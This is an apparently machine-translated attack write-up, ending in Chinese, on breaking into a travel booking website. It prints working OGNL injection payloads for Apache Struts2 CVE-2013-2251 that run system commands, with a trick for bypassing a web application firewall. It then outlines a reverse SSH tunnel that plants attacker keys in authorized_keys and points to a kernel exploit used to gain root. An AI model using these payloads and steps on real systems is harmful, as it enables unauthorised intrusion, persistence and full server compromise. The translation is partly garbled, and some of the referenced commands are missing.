This article is about Apache struts2 CVE-2013-2251 is a highly exploited vulnerability due to effects that lead to remote command execution. In short, a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution in Java web applications using <Struts 2.3.15 as a framework.
Now, as the bug spreads virally, major application firewall vendors are starting to update their rules engines and detection technology to prevent it from happening. But the author was not only able to bypass the firewall and gain remote code execution, but was also able to escalate privileges to gain server privileges as root by exploiting a kernel vulnerability.
When the author was testing the travel booking website, because in order to find out if the application is running on the vulnerable Apache Struts framework exploit, just check the following vulnerable parameters - "action, redirect, redirectAction" and the correct Effective attack payload, found by google the blog that exploits the poc (must build an OGNL expression), http://blog.opensecurityresearch.com/2014/02/attacking-struts-with-cve-2013-2251.html , the following is The payload used to run the command "ifconfig" .
redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
But as expected, it is blocked by the application firewall and will redirect to a bot machine page.
When something like this happens to the author, as pointed out earlier, knowing which parameters are vulnerable, one of which is the "redirect" parameter used in the above request. "redirect ", yes you think it's correct, let's try redirecting here, just redirect it to http://www.goal.com
As you can see, the author got a 302 redirect to the location http://www.goal.com, so the previous ifconfig command payload was blocked, this redirect method, gave the author a way to bypass the firewall The idea, so, modify the above payload as follows:
redirect:http://www.goal.com/${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
and make a request:
The following shows the output of the "ifconfig" command that was able to bypass the firewall and get running:
The next goal is to get a remote shell to the server , the author uses reverse SSH tunneling and public key authentication to try and get a shell , which allows SSH users to log in without entering a password. Therefore, the author must put the ssh public key of the attacker server into the authorized path of the victim server ~/.ssh/authorized_keys. In order to obtain the authorized identity and obtain it as a reverse ssh tunnel, the id_rsa.pub of the victim ssh server must also be added public key. To illustrate the concept of the 2 keywords above and understand the concept of public key authentication ----- id_rsa.pub is the public key that you add to the authorized_keys file of other hosts to allow you to log in as that user. authorized_keys is a list of public keys that are allowed to log in to a specific account on a specific server.
Step 1 - Use RCE to find the victim server's id_rsa.pub file location
Step 2 - Copy authorized_keys from victim server to attacker server
Step 3 - Copy the modified authorized_keys back from the attacker server, get a shell by reading id_rsa.pub .
Last step - SSH uses a reverse tunnel on the attacker machine, so run the following command line:
能够获得服务器的远程shell,但没以root登陆的权限,这就意味着只有有限的权利访问文件和命令执行。 现在为了获取以root用户身份登录的权限,作者首先查看当前受害机器上运行的内核版本是什么:
因此发现了内核版本是2.6.32,通过google查找到利用的CVE,该CVE可
容易进行账户提权和漏洞利用----https: //github.com/realtalk/cve-2013-2094 ,最终够获得root用户权限。
这就是如何通过利用apache strut 2漏洞和内核版本漏洞利用结合来获取以root用户服务器的远程shell。